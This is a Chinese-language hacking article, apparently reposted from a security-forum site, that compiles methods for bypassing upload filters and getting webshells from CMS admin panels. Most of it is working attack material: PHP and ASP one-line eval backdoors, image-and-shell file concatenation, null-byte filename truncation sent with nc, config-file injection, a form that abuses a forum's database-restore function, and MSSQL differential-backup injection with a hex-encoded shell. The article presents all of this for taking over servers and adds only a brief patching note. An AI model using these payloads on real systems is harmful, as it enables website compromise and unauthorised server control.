一般網站圖片上傳功能都對文件進行過濾,防止webshelll寫入。但不同的程序對過濾也不一樣,如何突破過濾繼續上傳?
本文總結了七種方法,可以突破!
1、文件頭+GIF89a法。(php)//這個很好理解,直接在php馬最前面寫入gif89a,然后上傳dama.php
2、使用edjpgcom工具向圖片注入代碼。(php)//edjpgcom修改,加入php一句話保存為dama.php
3、cmd命令下copy 圖片.GIF+shell.php webshell.php (php) //估計和1是同樣的原理,欺騙上傳webshell.php
4、C32asm打開圖片在文件末尾空一格加入代碼<?php eval($_POST[cmd])?> 。(php)//填充php一句話然后上傳。
5、在4基礎上改進代碼<?php fputs(fopen("error.php"."w")."<?eval(\$_POST[cmd]);?>")?> 。(php)//同
目錄下生成error.php,提問:asp的怎么改寫?
回答:asp測試的結果是:沒有權限...
<%
Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject")
Set MyTextFile=MyFileObject.CreateTextFile("kafei.asp")
MyTextFile.WriteLine("\<\%eval request(chr(35))\%\>")
MyTextFile.Close
%>
6、IIS解析目錄名漏洞1.php;.jpg (jpg) //這是文件名變量沒有過濾。
7、nc抓包改數據 //路徑名和文件名沒有過濾。
//通過抓包修改上傳路徑通過/upload/1.asp+空格,使用軟件把空格填充為00。然后nc提交獲取webshell。
等待補充...
1、於是本地建了一個MDB數據庫,寫入
┼攠數畣整爠煥敵瑳∨≡┩愾
2、然后改為ASP上傳,一句話木馬上傳成功了,再拿客戶端去連的時候,出來了一流監控系統的提示
估計前面的SHELL為空也是這東西搞的。。
於是先將自己的SHELL用微軟的screnc.exe進行加密。
3、然后新建一個很小的圖片。
在CMD下面copy /b a.jpg+shell.asp rs.asp
利用二進制的方式將兩個文件合並在一起。 這次再上傳,成功了,沒有被那個監控系統擋下來。
4、但是這時的SHELL要在FIREFOX下面才可以瀏覽,放到IE下面的話只會的到一張圖片,而看不到SHELL 。
因為前面將SHELL與圖片合並在一起了,所以這時的SHELL里面有很多亂碼,這時利用SHELL的遠程文件下載功能。
因為一流監控系統只會對向上傳的數據進行檢查,對服務器下載的數據並不會進行檢測。
將一個干凈的SHELL下載到服務器上就行,先將SHELL存為TXT文件然后傳到自己的服務器上,然后再利用SHELL提供的遠程文件下載功能將那個TXT文件下載到服務器上面存為ASP,這樣就拿到了一個干凈的SHELL。
================================================
上傳漏洞主要就是利用'\0'字符漏洞,'\0'字符在系統中被用作字符串結束的標志
基本原理就是網絡程序雖然禁止了.asp等后綴名文件的上傳,但是都會允許.jpg或者.gif格式文件的上傳。
這樣如果自己構造數據包 formPath=UploadFile/shell.asp'\0 '.jpg,那么'\0 '后面的字符將被截斷,原因是計算機遇到'\0'字符,認為字符串結束了。於是我們就向服務器上傳了一個名為shell.asp的ASP木馬程序,后面的就不多說了,webshell的功能已經很強大了,如果再配合Serv-U取得server的管理員權限...
入侵過程:
條件:需要至少NC、WinSock Expert、UltraEdit三個工具和一個webshell程序
nc.exe(netcat) - 一個變形了的telnet,嗅探器,網絡安全屆的軍刀!
WinSock Expert - 抓包工具,可以截獲網絡通訊的數據流
UltraEdit - ......不說了,無人不知無人不曉-_-!
webshell - ASP、PHP等木馬程序
1.第一步,打開目標系統的上傳頁面,通過WinSock Expert監視,上傳webshell.asp文件,再打開WinSock Expert,將截獲的數據流存為文本文件
(兩個send下面的所有內容,包括回車產生的空白行)
2.通過UltraEdit修改文本文件中的關鍵代碼:filename="C:\test\webshell.asp" ,webshell.asp后加:1個空格及.jpg,然后跳到16進制編輯狀態,修改16進制下空格的20為00,Content-Length長度增加5。(一個字符算一個字節,' .jpg'一個5個字節)
3.nc出場~!^^
指令:nc -vv www.xxx.com 80 < 1.txt
后台拿web shell全集
今天帶給大家的都是些技術上的總結,有些人老問經驗怎么來的,這個就是經驗,希望大家都能成為腳本高手.
動網上傳漏洞,相信大家拿下不少肉雞 。可以說是動網讓upfile.asp上傳文件過濾不嚴的漏洞昭然天下,現在這種漏洞已經基本比較難見到了,不排除一些小網站仍然存在此漏洞。在拿站過程中,我們經常費了九牛兩虎之力拿到管理員帳號和密碼,並順利進入了后台,雖然此時與拿到網站webshell還有一步之遙,但還是有許多新手因想不出合適的方法而被拒之門外。因此,我們把常用的從后台得到webshell的方法進行了總結和歸納,大體情況有以下十大方面。
注意:如何進入后台,不是本文討論范圍,其具體方法就不說了,靠大家去自己發揮。此文參考了前人的多方面的資料和信息,在此一並表示感謝。
一、直接上傳獲得webshell
這種對php和jsp的一些程序比較常見,MolyX BOARD就是其中一例,直接在心情圖標管理上傳.php類型,雖然沒有提示,其實已經成功了,上傳的文件url應該是http://forums/images/smiles/下,前一陣子的聯眾游戲站和網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名,bo-blog后台可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統),因過濾上傳文件不嚴,導致用戶可以直接上傳webshell到網站任意可寫目錄中,從而拿到網站的管理員控制權限。
二、添加修改上傳類型
現在很多的腳本程序上傳模塊不是只允許上傳合法文件類型,而大多數的系統是允許添加上傳類型,bbsxp后台可以添加asa asP類型,ewebeditor的后台也可添加asa類型,通過修改后我們可以直接上傳asa后綴的webshell了,還有一種情況是過濾了.asp,可以添加.aspasp的文件類型來上傳獲得webshell。php系統的后台,我們可以添加.php.g1f的上傳類型,這是php的一個特性,最后的哪個只要不是已知的文件類型即可,php會將php.g1f作為.php來正常運行,從而也可成功拿到shell。LeadBbs3.14后台獲得webshell方法是:在上傳類型中增加asp ,注意,asp后面是有個空格的,然后在前台上傳ASP馬,當然也要在后面加個空格! 七、asp+mssql系統
這里需要提一點動網mssql版,但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片,然后記住其上傳路徑。寫一個本地提交的表單,代碼如下:
<form act ion=http://網站/bbs/admin_data.asp?ac tion=RestoreData&act=Restore method="post">
<p>已上傳文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要復制到的位置:<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p> </form>
另存為.htm本地執行。把假圖片上傳路徑填在“已上傳文件的位置”那里,想要備份的WebShell的相對路徑填寫在“要復制到的位置”那里,提交就得到我們可愛的WebShell了,恢復代碼和此類似,修改相關地方就可以了。沒有遇到過后台執行mssql命令比較強大的asp程序后台,動網的數據庫還原和備份是個擺設,不能執行sql命令備份webshell,只能執行一些簡單的查詢命令。可以利用mssql注入差異備份webshell,一般后台是顯示了絕對路徑,只要有了注入點基本上就可以差異備份成功。下面是差異備份的主要語句代碼,利用動網7.0的注入漏洞可以用差異備份一個webshell,可以用利用上面提到的方法,將conn.asp文件備份成.txt文件而獲得庫名。
差異備份的主要代碼:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
這段代碼中,0x626273是要備份的庫名bbs的十六進制,可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六進制,是lp最小馬;0x643A5C7765625C312E617370是d:\web\1.asp的十六進制,也就是你要備份的webshell路徑。當然也可以用比較常見備份方式來獲得webshell,唯一的不足就是備份后的文件過大,如果備份數據庫中有防下載的的數據表,或者有錯誤的asp代碼,備份出來的webshell就不會成功運行,利用差異備份是成功率比較高的方法,並且極大的減少備份文件的大小。
八、php+mysql系統
后台需要有mysql數據查詢功能,我們就可以利用它執行SELECT ... INTO OUTFILE查詢輸出php文件,因為所有的數據是存放在mysql里的,所以我們可以通過正常手段把我們的webshell代碼插入mysql在利用SELECT ... INTO OUTFILE語句導出shell。
就可以暴出路徑,php環境中比較容易暴出絕對路徑:)。提一點的是遇到是mysql在win系統下路徑應該這樣寫。下面的方法是比較常用的一個導出webshell的方法,也可以寫個vbs添加系統管理員的腳本導出到啟動文件夾,系統重起后就會添加一個管理員帳號
就會在up目錄下生成文件名為saiy.php內容為的最小php木馬, 最后用lanker的客戶端來連接。實際運用中要考慮到文件夾是否有寫權限。或者輸入這樣的代碼 將會在當前目錄生成一個a.php的最小馬。
九、phpwind論壇從后台到webshell的三種方式
方式1 模板法
進入后台, 風格模版設置 ,在隨便一行寫代碼,記住,這代碼必須頂着左邊行寫,代碼前面不可以有任何字符。
方始2 臟話過濾法
方式3 用戶等級管理
以上三種方式得到webshellr的密碼是a,為lanker的一句話后門服務端。
十、也可以利用網站訪問計數系統記錄來獲得webshell
解決方案
由於本文涉及的代碼版本很多,所以不可能提供一個完美的解決方案。有能力者可以針對本文提到的漏洞文件進行適當修補,若漏洞文件不影響系統使用也可刪除此文件。大家如果不會修補,可以到相關官方網站下載最新補丁進行修復更新。同時也請大家能時刻關注各大安全網絡發布的最新公告,若自己發現相關漏洞也可及時通知官方網站。
后記
其實,從后台得到webshell的技巧應該還有很多的,關鍵是要看大家怎么靈活運用、觸類旁通,希望本文的方法能起到拋磚引玉的作用。 各位加油吧,讓我們將服務器控制到底!
三、利用后台管理功能寫入webshell
上傳漏洞基本上補的也差不多了,所以我們進入后台后還可以通過修改相關文件來寫入webshell。比較的典型的有dvbbs6.0,還有leadbbs2.88等,直接在后台修改配置文件,寫入后綴是asp的文件。而LeadBbs3.14后台獲得webshell另一方法是:添加一個新的友情鏈接,在網站名稱處寫上冰狐最小馬即可,最小馬前后要隨便輸入一些字
,http:\\網站\inc\IncHtm\BoardLink.asp就是我們想要的shell。
四、利用后台管理向配置文件寫webshell
利用"""":""//"等符號構造最小馬寫入程序的配置文件,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程序等等,還有很多php程序都可以,COCOON Counter統計程序舉例,在管理郵箱處添上cnhacker@263.net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//",還有一種方法就是寫上 cnhacker@263.net"%><%eval request(chr(35))%><%’,這樣就會形成前后對應,最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是數據庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入一句話馬"%><%execute request("l")%><%’,保 存頂部欄目菜單參數設置成功后,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。
五、利用后台數據庫備份及恢復獲得webshell
主要是利用后台對access數據庫的“備份數據庫”或“恢復數據庫”功能,“備份的數據庫路徑”等變量沒有過濾導致可以把任意文件后綴改 為asp,從而得到webshell,msssql版的程序就直接應用了access版的代碼,導致sql版照樣可以利用。還可以備份網站asp文件為其他后綴 如.txt文件,從而可以查看並獲得網頁源代碼,並獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候,但是有asp系統在運行,利用此方法來查看源代碼來獲得其數據庫的位置,為數據庫插馬來創造機會,動網論壇就有一個ip地址的數據庫,在后台的ip管理中可以插入最小馬然后備份成.asp文件即可。在談談突破上傳檢測的方法,很多asp程序在即使改了后綴名后也會提示文件非法,通過在.asp文件頭加上gif89a修改后綴為gif來騙過asp程序檢測達到上傳的目的,還有一種就是用記事本打開圖片文件,隨便粘貼一部分復制到asp木馬文件頭,修改gif后綴后上傳也可以突破檢測,然后備份為.asp文件,成功得到webshell。
六、利用數據庫壓縮功能
可以將數據的防下載失效從而使插入數據庫的最小馬成功運行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫上<%eval request (chr(35))%>, 提交后,在數據庫操作中壓縮數據庫,可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個webshell。
本篇文章來源於 新世紀網安基地 (www.520hack.com) 原文出處:http://www.520hack.com/Article/Text2/200911/16637.html